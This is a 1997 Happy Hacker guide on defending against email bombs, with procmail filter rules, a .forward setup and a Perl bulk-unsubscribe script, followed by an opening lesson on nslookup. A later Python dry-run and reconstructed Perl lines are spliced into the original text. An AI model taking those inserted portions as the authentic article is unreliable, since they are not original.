Contents of Volume 3:

  How to protect yourself from email bombs!
  How to map the Internet.
  How to keep from getting kicked off IRC!
  How to Read Email Headers and Find Internet Hosts
  The Dread GTMHH on Cracking
  How to Be a Hero in Computer Lab
  Introduction to Computer Viruses
  The Magical Mystical Crypto Primer
  War Tools! Scan, Sniff, Spoof and Hijack
  How to Break into Windows NT

________________________________________

GUIDE TO (mostly) HARMLESS HACKING

Vol. 3 Number 1

How to protect yourself from email bombs!

________________________________________

Email bombs! People like angry johnny, AKA the "Unamailer," have made the news lately by arranging for 20 MB or more of email -- tens of thousands of messages -- to flood every day into his victims' email accounts.

Email bombing can be bad news for two reasons. One, the victim can't easily find any of their legitimate email in that giant garbage heap of spam. Two, the flood of messages ties up mail servers and chews up communications bandwidth. Of course, those are the two main reasons that email bombers make their attacks: to mess up people's email and/or harm the ISPs they target. The email bomb is a common weapon of war against Internet hosts controlled by spammers and con artists. It also is used by lusers with a grudge.

News stories make it sound like email bombing victims are, ahem, s*** out of luck. But we aren't. We know, because angry -- the Christmas email bomber -- told the press that he had targeted the Happy Hacker list's Supreme Commanderess, Carolyn Meinel. (Someone simultaneously attempted to email bomb the Happy Hacker list itself, but no one has stepped forward to take credit for the attempt.)

But as you know from the fact that we got the Happy Hacker Digest out after the attack, and by the fact that I kept answering my email, there are ways to beat the email bombers. Now most of these are techniques for use by experts only.
But if you are, like most of us on this list, a newbie, you may be able to win points with your ISP by emailing its technical help people with some of the information within this guide. Maybe then they'll forgive you if your shell log file gets to looking a little too exciting!

My first line of defense is to use several on-line services. That way, whenever one account is getting hacked, bombed, etc., I can just email all my correspondents and tell them where to reach me. Now I've never gotten bombed into submission, but I have gotten hacked badly and often enough that I once had to dump an ISP in disgust. Or, an ISP may get a little too anxious over your hacking experiments. So it's a good idea to be prepared to jump accounts.

But that's a pretty chicken way to handle email bombing. Besides, a member of the Happy Hacker list says that the reason angry johnny didn't email bomb all the accounts I most commonly use is because he persuaded johnny to just bomb one for publicity purposes. But even if johnny had bombed all my favorite accounts, I could have been back on my feet in a hurry. There are several ways that either your ISP or you can defeat these attacks.

The simplest defense is for your ISP to block mail bombs at the router. This only works, however, if the attack is coming from one or a few hosts. It also only works if your ISP agrees to help you out. Your ISP may just chicken out instead and close your account.

***************************
Newbie note: routers are specialized computers that direct traffic. A host is a computer on the Internet.
***************************

But what if the attack comes from many places on the Internet? That happened to me on Christmas day when angry johnny took credit for an email bombing attack that also hit a number of well-known US figures such as evangelist Billy Graham, President Bill Clinton and Speaker of the US House of Representatives Newt Gingrich. (I blush to find myself in such company.)
The way angry johnny worked this attack was to set up a program that would go to one computer that runs a program to handle email lists and automatically subscribe his targets to all lists handled by that computer. Then his program went to another computer that handles email lists and subscribed his targets to all the lists it handled, and so on.

I was able to fix my problem within a few minutes of discovery. johnny had subscribed all these lists to my address cmeinel@swcp.com. But I use my private domain, techbroker.com, to receive email. Then I pipe all this from my nameserver at Highway Technologies to whatever account I find useful at the time. So all I had to do was go to the Highway Technologies Web site and configure my mail server to pipe email to another account.

**************************
Newbie note: a mail server is a computer that handles email. It is the one to which you hook your personal computer when you give it a command to upload or download your email.
**************************

***********************
Evil genius tip: You can quickly reroute email by creating a file in your shell account (you do have a shell account, don't you? SHELL ACCOUNT! All good hackers should have a SHELL ACCOUNT!) named .forward. This file directs your email to another email account of your choice.
***********************

If angry johnny had email bombed cmeinel@techbroker.com, I would have piped all that crud to /dev/null and requested that my correspondents email to carolyn@techbroker.com, etc. It's a pretty flexible way of handling things. And my swcp.com accounts work the same way. That ISP, Southwest Cyberport, offers each user several accounts all for the same price, which is based on total usage. So I can create new email addresses as needed.

Warning -- this technique -- every technique we cover here -- will still cause you to lose some email. But I figure, why get obsessive over it?
According to a study by a major paging company, a significant percentage of email simply disappears. No mail daemon warning that the message failed, nothing. It just goes into a black hole. So if you are counting on getting every piece of email that people send you, dream on.

But this doesn't solve my ISP's problem. They still have to deal with the bandwidth problem of all that crud flooding in. And it's a lot of crud. One of the sysadmins at Southwest Cyberport told me that almost every day some luser email bombs one of their customers. In fact, it's amazing that angry johnny got as much publicity as he did, considering how commonplace email bombing is. So essentially every ISP somehow has to handle the email bomb problem.

How was angry johnny able to get as much publicity as he did? You can get an idea from this letter from Lewis Koch, the journalist who broke the story (printed with his permission):

From: Lewis Z Koch
Subject: Question

Carolyn:

First, and perhaps most important, when I called you to check if you had indeed been email bombed, you were courteous enough to respond with information. I think it is a tad presumptuous for you to state that "as a professional courtesy I am _letting_ Lewis Koch get the full scoop." This was a story that was, in fact, exclusive.

(Carolyn's note: as a victim I knew technical details about the attack that Koch didn't know. But since Koch tells me he was in contact with angry johnny in the weeks leading up to the mass email bombings of Christmas 1996, he clearly knew a great deal more than I about the list of johnny's targets. I also am a journalist, but deferred to Koch by not trying to beat him to the scoop.)

Second, yes I am a subscriber and I am interested in the ideas you advance. But that interest does not extend to feeding you -- or any single individual or group -- "lots of juicy details." The details of any story lay in the writing and commentary I offer the public.
"Juicy" is another word for sensationalism, a tabloid approach -- and something I carefully avoid.

(Carolyn's note: If you wish to see what Koch wrote on angry johnny, you may see it in the Happy Hacker Digest of Dec. 28, 1996.)

The fact is I am extraordinarily surprised by some of the reactions I have received from individuals, some of whom were targets, others who are bystanders. The whole point is that there are extraordinary vulnerabilities to and on the Net -- vulnerabilities which are being ignored...at the peril of us all.

Continuing: "However, bottom line is that the email bomber used a technique that is ridiculously lame -- so lame that even Carolyn Meinel could turn off the attack in mere minutes. Fry in dev/null, email bomber!"

johnny made the point several times that the attack was "simple." It was deliberately designed to be simple. I imagine -- I know -- that if he, or other hackers, had chosen to do damage, serious, real damage, they could easily do so. They chose not to.

One person who was attacked was angry with my report. He used language such as "his campaign of terror," "the twisted mind of 'johnny'," "psychos like 'johnny'," "some microencephalic moron," "a petty gangster" to describe johnny. This kind of thinking ignores history and reality. If one wants to use a term such as "campaign of terror" they should check into the history of the Unabomber, or the group that bombed the Trade Center, or the Federal Building in Oklahoma City...or look to what has happened in Ireland or Israel. There one finds "terrorism."

What happened was an inconvenience -- equivalent, in my estimation, to the same kind of inconvenience people experienced when young people blocked the streets of major cities in protest against the war in Vietnam. People were inconvenienced -- but the protesters were making a point about an illegal and unnecessary war that even the prosecutors of the war, like Robert McNamara, knew from the beginning was a lost venture.
Hundreds of thousands of people lost their lives in that war -- and if some people found themselves inconvenienced by people protesting against it -- I say, too d*** bad.

Thank you for forwarding my remarks to your list.

Ahem. I'm flattered, I guess. Is Koch suggesting the Happy Hacker list -- with its habit of ***ing out naughty words -- and evangelist Billy Graham -- whose faith I share -- are of an Earth-shaking level of political bad newsness comparable to the Vietnam War?

So let's say you don't feel that it is OK for any two-bit hacker wannabe to keep you from receiving email. What are some more ways to fight email bombs?

For bombings using email lists, one approach is to run a program that sorts through the initial flood of the email bomb for those "Welcome to the Tomato Twaddler List!" messages which tell how to unsubscribe. These programs then automatically compose unsubscribe messages and send them out.

Another way your ISP can help you is to provide a program called Procmail (which runs on the Unix operating system). For details, Zach Babayco (zachb@netcom.com) has provided the following article. Thank you, Zach!

*******************************

Defending Against Email-Bombing and Unwanted Mail
Copyright (C) Zach Babayco, 1996

[Before I start this article, I would like to thank Nancy McGough for letting me quote liberally from her Filtering Mail FAQ, available at http://www.cis.ohio-state.edu/hypertext/faq/usenet/mail/filtering-faq/faq.html. This is one of the best filtering-mail FAQs out there, and if you have any problems with my directions or want to learn more about filtering mail, this is where you should look.]

Lately, there are more and more people out there sending you email that you just don't want, like "Make Money Fast!" garbage or lame ezines that you never requested or wanted in the first place. Worse, there is the email bomb. There are two types of email bombs, the Massmail and the Mailing List bomb:

1) Massmail-bombing. This is when an attacker sends you hundreds, or perhaps even thousands of pieces of email, usually by means of a script and fakemail. Of the two types, this is the easier to defend against, since the messages will be coming from just a few addresses at the most.

2) Mailing List bombs. In this case, the attacker will subscribe you to as many mailing lists as he or she can. This is much worse than a massmail because you will be getting email from many different mailing lists, and will have to save some of it so that you can figure out how to unsubscribe from each list.

This is where Procmail comes in. Procmail (pronounced prok-mail) is an email filtering program that can do some very neat things with your mail. For example, if you subscribe to several high-volume mailing lists, it can be set up to sort the mail into different folders so that all the messages aren't mixed up in your Inbox. Procmail can also be configured to delete email from certain people and addresses.

Setting up Procmail
-------------------

First, you need to see if your system has Procmail installed. From the prompt, type:

  > which procmail

If your system has Procmail installed, this command will tell you where Procmail is located. Write this down - you will need it later.

*NOTE* If your system gives you a response like "Unknown command: which" then try substituting 'which' with 'type', 'where', or 'whereis'. If you still cannot find Procmail, then it is probably a good bet that your system does not have it installed. However, you're not completely out of luck - look at the FAQ I mentioned at the beginning of this file and see if your system has any of the programs that it talks about.

Next, you have to set up a resource file for Procmail. For the rest of this document, I will use the editor Pico. You may use whichever editor you feel comfortable with. Make sure that you are in your home directory, and then start up your editor.
  > cd
  > pico .procmailrc

Enter the following in the .procmailrc file:

  # This line tells Procmail what to put in its log file. Set it to on when
  # you are debugging.
  VERBOSE=off

  # Replace 'mail' with your mail directory.
  MAILDIR=$HOME/mail

  # This is where the logfile and rc files will be kept
  PMDIR=$HOME/.procmail
  LOGFILE=$PMDIR/log

  # INCLUDERC=$PMDIR/rc.noebomb

(yes, type the INCLUDERC line WITH the #)

Now that you've typed this in, save it and go back up to your home directory.

  > cd
  > mkdir .procmail

Now go into the directory that you just made, and start your editor up with a new file, rc.noebomb:

IMPORTANT: Be sure that you turn off your editor's word wrapping during this part. The first condition (the long line beginning with * !) must be typed as ONE line, even though it wraps on your screen here. With Pico, use the -w flag. Consult your editor's manual page for instructions on turning off its word wrapping. Make sure that when you edit it, you leave NO SPACES in that line.

  > cd .procmail
  > pico -w rc.noebomb

  # noebomb - email bomb blocker
  :0
  * ! ^((((Resent-)?(From|Sender)|X-Envelope-From):|From )(.*[^.%@a-z0-9])?(Post(ma?(st(e?r)?|n)|office)|Mail(er)?|daemon|mmdf|root|uucp|LISTSERV|owner|request|bounce|serv(ices?|er))([^.!:a-z0-9]|$))
  * ! ^From:.*(postmaster|Mailer|listproc|majordomo|listserv|cmeinel|johnb)
  * ! ^TO(netstuff|computing|pcgames)
  /dev/null

Let's see what these do. The first line tells Procmail that this is the beginning of a "recipe" file. A recipe is basically what it sounds like -- it tells the program what it should look for in each email message, and if it finds what it is looking for, it performs an action on the message - forwarding it to someone; putting it in a certain folder; or in this case, deleting it.

The second, third, and fourth lines (the ones beginning with a *) are called CONDITIONS. The asterisk (*) tells Procmail that this is the beginning of a condition. The ! tells it to do the OPPOSITE of what it would normally do.

Condition 1:

  * ! ^((((Resent-)?(From|Sender)|X-Envelope-From):|From )(.*[^.%@a-z0-9])?(Post(ma?(st(e?r)?|n)|office)|Mail(er)?|daemon|mmdf|root|uucp|LISTSERV|owner|request|bounce|serv(ices?|er))([^.!:a-z0-9]|$))

Don't freak out over this, it is simpler than it seems at first glance. This condition tells Procmail to look at the header of a message, and see if it is from one of the administrative addresses like root or postmaster, and also check to see if it is from a mailer-daemon (the thing that sends you mail when you bounce a message). If a message IS from one of those addresses, the recipe will put the message into your inbox and not delete it.

Advanced User Note: Those of you who are familiar with Procmail are probably wondering why I require the user to type in that whole long line of commands, instead of using the FROM_MAILER command. Well, it looked like a good idea at first, but I just found out a few days ago that FROM_MAILER also checks the Precedence: header for the words junk, bulk, and list. Many (if not all) mailing-list servers have either Precedence: bulk or Precedence: list, so if someone subscribes you to several hundred lists, FROM_MAILER would let most of the messages through, which is NOT what we want.

Condition 2:

  * ! ^From:.*(listproc|majordomo|cmeinel|johnb)

This condition does some more checking of the From: line in the header. In this example, it checks for the words listproc, majordomo, cmeinel, and johnb. If it is from any of those people, it gets passed on to your Inbox. If not, it's a goner. This is where you would put the usernames of people who normally email you, and also the usernames of mailing-list servers, such as listproc and majordomo. When editing this line, remember to: only put the username in the condition, not a person's full email address, and remember to put a | between each name.

Condition 3:

  * ! ^TO(netnews|crypto-stuff|pcgames)

This final condition is where you would put the usernames of the mailing lists that you are subscribed to (if any). For example, I am subscribed to the netnews, crypto-stuff, and pcgames lists. When you get a message from most mailing lists, most of the time the list address will be in the To: or Cc: part of the header, rather than the From: part. This line will check for those usernames and pass them through to your Inbox if they match. Editing instructions are the same as the ones for Condition 2.

The final line, /dev/null, is essentially the trash can of your system. If a piece of email does not match any of the conditions (i.e. it isn't from a mail administrator, it isn't from a listserver or someone you write to, and it's not a message from one of your usual mailing lists) Procmail dumps the message into /dev/null, never to be seen again.

Ok. Now you should have created two files: .procmailrc and rc.noebomb. We need one more before everything will work properly. Save rc.noebomb and exit your editor, and go to your home directory. Once there, start your editor up with the no word wrapping command.

  > cd
  > pico -w .forward

We now go to an excerpt from Nancy M.'s Mail Filtering FAQ:

Enter a modified version of the following in your ~/.forward:

  "|IFS=' ' && exec /usr/local/bin/procmail -f- || exit 75 #nancym"

== IMPORTANT NOTES ==

* Make sure you include all the quotes, both double (") and single (').
* The vertical bar (|) is a pipe.
* Replace /usr/local/bin with the correct path for procmail (see step 1).
* Replace `nancym' with your userid. You need to put your userid in your .forward so that it will be different than any other .forward file on your system.
* Do NOT use ~ or environment variables, like $HOME, in your .forward file. If procmail resides below your home directory write out the *full* path.
On many systems you need to make your .forward world readable and your home directory world searchable in order for the mail transport agent to "see" it. To do this type:

  cd
  chmod 644 .forward
  chmod a+x .

If the .forward template above doesn't work the following alternatives might be helpful:

In a perfect world:
  "|exec /usr/local/bin/procmail #nancym"

In an almost perfect world:
  "|exec /usr/local/bin/procmail USER=nancym"

In another world:
  "|IFS=' ';exec /usr/local/bin/procmail #nancym"

In a different world:
  "|IFS=' ';exec /usr/local/bin/procmail USER=nancym"

In a smrsh world:
  "|/usr/local/bin/procmail #nancym"

Now that you have all the necessary files made, it's time to test this filter. Go into your mailreader and create a new folder called Ebombtest. This procedure differs from program to program, so you may have to experiment a little. Then open up the rc.noebomb file and change /dev/null to Ebombtest. (You should have already changed Conditions 2 and 3 to what you want; if not, go do it now!) Finally, open up .procmailrc and remove the # from the last line. You will need to leave this on for a bit to test it.

Ask some of the people in Condition 2 to send you some test messages. If the messages make it through to your Inbox, then that condition is working fine. Send yourself some fake email under a different name and check to see if it ends up in the Ebombtest folder. Also, send yourself some fakemail from root@wherever.com to make sure that Condition 1 works. If you're on any mailing lists, those messages should be ending up in your Inbox as well.

If all of these test out fine, then congratulations! You now have a working defense against email bombs. For the moment, change the Ebombtest line in the rc.noebomb file back to /dev/null, and put the # in front of the INCLUDERC line in the .procmailrc file.
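The same dry run can be done on paper before the Ebombtest step. This is an added Python example, not part of Zach's article or of procmail: the recipe's three conditions are transcribed for Python's re module (procmail matches case-insensitively and its ^ matches at the start of every header line), Conditions 2 and 3 use the names from the article, and the ^TO macro is approximated by To:/Cc:. The headers are constructed; the run shows a list message whose Sender: is an owner- address being passed by Condition 1, and which samples FROM_MAILER would have let through on the Precedence: header alone.

```python
"""Dry run of the rc.noebomb recipe against constructed message headers."""
import re

# Condition 1: mail from administrative or daemon addresses always gets through.
ADMIN_RE = re.compile(
    r"^(((Resent-)?(From|Sender)|X-Envelope-From):|From )(.*[^.%@a-z0-9])?"
    r"(Post(ma?(st(e?r)?|n)|office)|Mail(er)?|daemon|mmdf|root|uucp|LISTSERV"
    r"|owner|request|bounce|serv(ices?|er))([^.!:a-z0-9]|$)",
    re.I | re.M,
)

# What FROM_MAILER additionally looks at, per the Advanced User Note.
PRECEDENCE_RE = re.compile(r"^Precedence:.*(junk|bulk|list)", re.I | re.M)


def build_rules(friends, lists):
    """Conditions 2 and 3, filled in with the user's own names.

    friends: usernames of correspondents and list-server programs (From:).
    lists:   local parts of the lists you subscribe to; procmail's ^TO macro
             covers the destination headers, approximated here by To:/Cc:.
    """
    friends_re = re.compile(
        r"^From:.*(" + "|".join(map(re.escape, friends)) + ")", re.I | re.M)
    lists_re = re.compile(
        r"^(To|Cc):.*(" + "|".join(map(re.escape, lists)) + ")", re.I | re.M)
    return friends_re, lists_re


def deliver(headers, friends_re, lists_re):
    """Return 'inbox' or '/dev/null' for one raw header block.

    The recipe negates every condition (* !), so a message is trashed only
    when none of them matches; a single match rescues it.
    """
    for rule in (ADMIN_RE, friends_re, lists_re):
        if rule.search(headers):
            return "inbox"
    return "/dev/null"


def from_mailer_would_rescue(headers):
    """True if procmail's FROM_MAILER would also pass this message: either
    Condition 1 matches or a junk/bulk/list Precedence: header is present."""
    return bool(ADMIN_RE.search(headers) or PRECEDENCE_RE.search(headers))


# Constructed sample headers (not real mail; example domains only).
SAMPLES = {
    "bounce": (
        "From MAILER-DAEMON@isp.example  Wed Dec 25 10:00:00 1996\n"
        "From: Mail Delivery Subsystem <MAILER-DAEMON@isp.example>\n"
        "To: you@isp.example\nSubject: Returned mail: User unknown\n"),
    "friend": (
        "From: johnb@friends.example\nTo: you@isp.example\nSubject: lunch?\n"),
    "my_list": (
        "From: alice@somewhere.example\nTo: crypto-stuff@lists.example\n"
        "Subject: Re: key lengths\n"),
    "bomb_welcome": (
        "From tomato-twaddler@lists.example  Wed Dec 25 10:01:00 1996\n"
        "From: tomato-twaddler@lists.example\nTo: you@isp.example\n"
        "Subject: Welcome to the Tomato Twaddler List!\nPrecedence: bulk\n"),
    # A list whose Sender: is owner-<list>: 'owner' is on Condition 1's list
    # of administrative names, so this one reaches the inbox anyway.
    "bomb_owner_sender": (
        "From: bob@elsewhere.example\nSender: owner-cheese-talk@lists.example\n"
        "To: cheese-talk@lists.example\nSubject: Welcome to cheese-talk\n"),
    "stranger": (
        "From: nobody@spamco.example\nTo: you@isp.example\nSubject: hi\n"),
}


def run_dry_run(friends=("listproc", "majordomo", "cmeinel", "johnb"),
                lists=("netnews", "crypto-stuff", "pcgames")):
    """Classify every sample; returns {name: (destination, from_mailer_flag)}."""
    friends_re, lists_re = build_rules(friends, lists)
    return {name: (deliver(h, friends_re, lists_re), from_mailer_would_rescue(h))
            for name, h in SAMPLES.items()}


if __name__ == "__main__":
    for name, (dest, fm) in run_dry_run().items():
        print(f"{name:18s} -> {dest:9s}  FROM_MAILER would rescue: {fm}")
```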
If someone ever decides to emailbomb you, you only need to remove the #, and you will have greatly cut down on the amount of messages coming into your Inbox, giving you a little bit of breathing room to start unsubscribing from all those lists, or start tracking down those idiots who did it and get their asses kicked off their ISPs.

If you have any comments or questions about this, email me at zachb@netcom.com. Emailbombs WILL go to /dev/null, so don't bother!

Disclaimer: When you activate this program, it is inevitable that a small amount of wanted mail MAY get put into /dev/null, due to the fact that it is nearly impossible to know the names of all the people that may write to you. Therefore, I assume no responsibility for any email which may get lost, and any damages which may come from those lost messages.

********************
Don't have procmail? If you have a Unix box, you can download procmail from ftp://ftp.informatik.rwth-aachen.de/pub/packages/procmail/
*******************

A note of thanks goes to Damien Sorder (jericho@dimensional.com) for his assistance in reviewing this guide.

And now, just to make certain you can get this invaluable Perl script to automatically unsubscribe email lists, here is the listing:

#!/usr/local/bin/perl
# unsubscribe
#
# A perl script by Kim Holburn, University of Canberra 1996.
# kim@canberra.edu.au
# Feel free to use this and adjust it. If you make any useful adjustments or
# additions send them back to me.
#
# This script will unsubscribe users in bulk from whatever mail lists they are
# subscribed to. It also mails them that it has done this.
# It is useful for sys admins of large systems with many accounts and
# floating populations, like student servers.
# This script must be run by root although I don't check for this.
# You have to be root to read someone else's mailbox and to
# su to their account, both of which this script need to do.
#
# This script when applied to a mailbox will look through it to find
# any emails sent by mailing lists, attempt to determine the address of the
# mailing list and then send an unsubscribe message from that user.
# If invoked with no options only the mailbox name(s) it will assume
# the mailbox filename is the same as the username, as it is on a sun.
#
# Technical details:
# To find emails from mailing lists it looks for "owner" as part of
# the originating email address in the BSD From line (envelope).
# list servers that don't do this will be missed if you can figure a way
# round this let me know.
# The script doesn't do any file locking but then it only reads the mailbox
# file.

sub fail_usage {
    if (@_) {
        print "Error : ", @_, "\n";
    }
    print "Usage : $0 [-d] mailboxes\n";
    print "Usage : $0 [-d] -u user mailbox\n";
    print "Usage : $0 [-d] -u user -l listname -h host -a listserver\n";
    print "where listserver is the full email address of the listserver\n";
    exit;
}

# Send "unsubscribe <list>" to the list server address, as the user (via su).
sub unsub {
    local ($myuser, $mylist, $myhost, $myaddress) = @_;
    if (!$debug) {
        if (!open (SEND, "|(USER=$myuser;LOGNAME=$myuser;su $myuser -c \"/usr/ucb/mail $myaddress\")")) {
            print "Couldn't open mailer for user \"$myuser\"\n";
            next;
        }
        print SEND "unsubscribe $mylist\n";
        close SEND;
    } else {
        print "No unsub \"$myuser\" on \"$mylist@$myhost\" to :\n";
        print "    $myaddress\n";
    }
}

# Tell the user what has been done on their behalf.
sub notify {
    local ($myuser, $mylist, $myhost, $myaddress) = @_;
    if (!$debug) {
        if (!open (SEND, "|/usr/ucb/mail -s \"unsubscribed $mylist\" $myuser")) {
            print "Couldn't open mailer for user \"$myuser\"\n";
            next;
        }
        # The body of this message was lost when the listing was extracted;
        # the text below is a minimal stand-in, not the original wording.
        $mess = <<EOM;
You have been unsubscribed from the mailing list $mylist at $myhost
(list server address: $myaddress).
EOM
        print SEND $mess;
        close SEND;
    } else {
        # Debug branch reconstructed to mirror unsub() above.
        print "No notify \"$myuser\" on \"$mylist@$myhost\"\n";
    }
}

# Options: -d (debug, send nothing), -u user, -l list, -h host, -a address.
while (($#ARGV > (-1)) && ($ARGV[0] =~ /^-/)) {
    if ($ARGV[0] eq '-d') {
        shift ARGV;
        $debug = 1;
    } elsif ($#ARGV < 1) {
        &fail_usage("option \"$ARGV[0]\" needs an argument");
    } elsif ($ARGV[0] eq '-u') {
        shift ARGV;
        $user = shift ARGV;
    } elsif ($ARGV[0] eq '-l') {
        shift ARGV;
        $list = shift ARGV;
    } elsif ($ARGV[0] eq '-h') {
        shift ARGV;
        $host = shift ARGV;
    } elsif ($ARGV[0] eq '-a') {
        shift ARGV;
        $address = shift ARGV;
    } else {
        &fail_usage();
    }
}
$usersupplied = ($user ne '');
#print "debug d=\"$debug\" u=\"$user\" l=\"$list\" h=\"$host\"\n";
#print "debug \$#ARGV=$#ARGV a=\"$address\" \n";

# No mailboxes given: unsubscribe one user from one list named on the command line.
if ($#ARGV == (-1)) {
    if ($usersupplied && $list ne '' && $host ne '' && $address ne '' && $#ARGV) {
        $list =~ s/@.*$//;
        $user =~ s/@.*$//;
        $host =~ s/^.*@//;
        if ($address !~ /@/) {
            &fail_usage("bad address");
        }
        &unsub ($user, $list, $host, $address);
        &notify ($user, $list, $host, $address);
        exit;
    } else {
        &fail_usage("no files and no addresses");
    }
}
if ($usersupplied && $#ARGV > 0) {
    &fail_usage();
}

foreach $file (@ARGV) {
    %addresses = ();
    if (!$usersupplied) {
        $user = $file;
    }
    $user =~ s@^.*/@@;
    if ($file =~ /^\./) {
        print "skipping wrong type of file \"$file\"\n";
        next;
    }
    if ($file =~ /\.lock/) {
        print "skipping lock file \"$file\"\n";
        next;
    }
    if ($file =~ /\./) {
        print "skipping wrong type of file \"$file\"\n";
        next;
    }
    $user =~ s/^\.//;
    $user =~ s/\..*$//;
    if (!open (MYFILE, "<$file")) {
        print "Couldn't open file \"$file\"\n";
        next;
    }
    print "--------------------------opening file \"$file\"\n";

    # First pass: collect list addresses written as owner-LIST@host,
    # LIST-owner@host, l-LIST@host or LIST-l@host.
    while (<MYFILE>) {
#       if (/(\bnews-[-\w.]+@)|([-\w.]+-news@)/i)
#       if (/(\brequest-[-\w.]+@)|([-\w.]+-request@)/i)
        if (/(\bowner-[-\w.]+@)|([-\w.]+-owner@)/i) {
            chop;
            tr/A-Z/a-z/;
            if (/\bowner-[-\w.]+@/) {
                s/^.*\bowner-([-\w.]+@[\w.]+)\b.*$/\1/;
            } else {
                s/(^|^.*[^-\w.])([-\w.]+)-owner(@[\w.]+)\b.*$/\2\3/;
            }
            if (/[^a-z0-9@.-]/) { next; }
            if (!defined ($addresses{$_})) { $addresses{$_} = ""; }
        }
        if (/(\bl-[-\w.]+@)|([-\w.]+-l@)/i) {
            chop;
            tr/A-Z/a-z/;
            if (/\bl-[-\w.]+@/) {
                s/^.*\bl-([-\w.]+@[\w.]+)\b.*$/\1/;
            } else {
                s/(^|^.*[^-\w.])([-\w.]+)-l(@[\w.]+)\b.*$/\2\3/;
            }
            if (/[^a-z0-9@.-]/) { next; }
            if (!defined ($addresses{$_})) { $addresses{$_} = ""; }
        }
    }
    close MYFILE;
    while (($key, $value) = each %addresses) {
        print "$key\n";
    }
    if (! keys %addresses) {
        print "no listservers\n";
        next;
    }

    # Second pass: for each list host, find which server program
    # (listserv, listproc or majordomo) actually takes the commands.
    if (!open (MYFILE, "<$file")) {
        print "Couldn't open file \"$file\"\n";
        next;
    }
    print "looking for listserver addresses\n";
    while (<MYFILE>) {
        foreach $address (keys %addresses) {
            $host = $address;
            $host =~ s/^.*@//;
            if (/(listserv|listproc|majordomo)@$host/i) {
                $addresses{$address} = $1;
#               print "found 1 = \"$1\"\n";
            }
        }
    }
    close MYFILE;

    while (($key, $value) = each %addresses) {
        $host = $key;
        $host =~ s/^.*@//;
        $list = $key;
        $list =~ s/@.*$//;
#       print "$value@$host key=\"$key\" list=\"$list\" \n";
        if ($value eq '') {
            # Server program unknown: try all three.
            $address = "listserv@$host,listproc@$host,majordomo@$host";
        } else {
            $address = "$value@$host";
        }
        print "address=\"$address\"\n";
        print "unsubscribe $list\n";
        if (!$debug) {
            print "Mailing $user\n";
            &unsub ($user, $list, $host, $address);
            &notify ($user, $list, $host, $address);
        } else {
            print "debug no mail\n";
        }
    }
}

________________________________________

Subscribe to our email list by emailing to hacker@techbroker.com with message "subscribe" or join our Hacker forum at http://www.infowar.com/cgi-shl/login.exe.

Want to share some kewl stuph with the Happy Hacker list? Correct mistakes? Send your messages to hacker@techbroker.com. To send me confidential email (please, no discussions of illegal activities) use cmeinel@techbroker.com and be sure to state in your message that you want me to keep this confidential. If you wish your message posted anonymously, please say so! Please direct flames to dev/null@techbroker.com. Happy hacking!

Copyright 1997 Carolyn P. Meinel. You may forward or post on your Web site this GUIDE TO (mostly) HARMLESS HACKING as long as you leave this notice at the end.

________________________________________

____________________________________________________________

GUIDE TO (mostly) HARMLESS HACKING

Vol. 3 Number 2

How to map the Internet. Dig! Whois! Nslookup! Traceroute! Netstat port is getting hard to use anymore, however...

____________________________________________________________

Why map the Internet?
* Because it's fun -- like exploring unknown continents. The Internet is so huge, and it changes so fast, no one has a complete map.

* Because when you can't make contact with someone in a distant place, you can help your ISP troubleshoot broken links in the Internet. Yes, I did that once when email failed to a friend in Northern Ireland. How will your ISP know that their communications provider is lying down on the job unless someone advises them of trouble?

* Because if you want to be a computer criminal, your map of the connections to your intended victim gives you valuable information. Now since this is a lesson on *legal* hacking, we're not going to help you out with how to determine the best box in which to install a sniffer or how to tell what IP address to spoof to get past a packet filter. We're just going to explore some of the best tools available for mapping the uncharted realms of the Internet.

For this lesson, you can get some benefit even if all you have is Windows. But to take full advantage of this lesson, you should either have some sort of Unix on your personal computer, or a shell account! SHELL ACCOUNT! If you don't have one, you may find an ISP that will give you a shell account at http://www.celestin.com/pocia/.

****************************
Newbie note: A shell account is an account with your ISP that allows you to give commands on a computer running Unix. The "shell" is the program that translates your keystrokes into Unix commands. Trust me, if you are a beginner, you will find bash (for Bourne again shell) to be easiest to use. Ask tech support at your ISP for a shell account set up to use bash. Or, you may be able to get the bash shell by simply typing the word "bash" at the prompt. If your ISP doesn't offer shell accounts, get a new ISP that does offer it. A great book on using the bash shell is _Learning the Bash Shell_, by Cameron Newham and Bill Rosenblatt, published by O'Reilly.
****************************

So for our mapping expedition, let's start by visiting the Internet in Botswana! Wow, is Botswana even on the Internet? It's a lovely landlocked nation in the southern region of Africa, famous for cattle ranching, diamonds and abundant wildlife. The language of commerce in Botswana is English, so there's a good chance that we could understand messages from their computers.

Our first step in learning about Botswana's Internet hosts is to use the Unix program nslookup.

****************************
Evil genius tip: Nslookup is one of the most powerful Internet mapping tools in existence. We can hardly do it justice here. If you want to learn how to explore to the max, get the book _DNS and BIND_ by Paul Albitz and Cricket Liu, published by O'Reilly, 1997 edition.
***************************

The first step may be to find where your ISP has hidden the program by using the command "whereis nslookup." (Or your computer may use the "find" command.) Aha -- there it is! I give the command:

->/usr/etc/nslookup
Default Server: swcp.com
Address: 198.59.115.2

>

These two lines and the slightly different prompt (it isn't an arrow any more) tell me that my local ISP is running this program for me. (It is possible to run nslookup on another computer from yours.) Now we are in the program, so I have to remember that my bash commands don't work any more.

Our next step is to tell the program that we would like to know what computers handle any given domain name.

> set type=ns

Next we need to know the domain name for Botswana. To do that I look up the list of top level domain names on page 379 of the 1997 edition of _DNS and BIND_. For Botswana it's bw. So I enter it at the prompt, remembering -- this is VERY important -- to put a period after the domain name:

> bw.
Server:  swcp.com
Address:  198.59.115.2

Non-authoritative answer:

This "non-authoritative answer" stuff tells me that this information has been stored for a while, so it is possible, but unlikely, that the information below has changed.

bw      nameserver = DAISY.EE.UND.AC.ZA
bw      nameserver = RAIN.PSG.COM
bw      nameserver = NS.UU.NET
bw      nameserver = HIPPO.RU.AC.ZA

Authoritative answers can be found from:
DAISY.EE.UND.AC.ZA      inet address = 146.230.192.18
RAIN.PSG.COM            inet address = 147.28.0.34
NS.UU.NET               inet address = 137.39.1.3
HIPPO.RU.AC.ZA          inet address = 146.231.128.1

I look up the domain name "za" and discover it stands for South Africa. This tells me that the Internet is in its infancy in Botswana -- no nameservers there -- but must be well along in South Africa. Look at all those nameservers!

***********************
Newbie note: a nameserver is a computer program that stores data on the Domain Name System. The Domain Name System makes sure that no two computers have the same name. It also stores information on how to find other computers. When various nameservers get to talking with each other, they eventually, usually within seconds, can figure out the routes to any one of the millions of computers on the Internet.
***********************

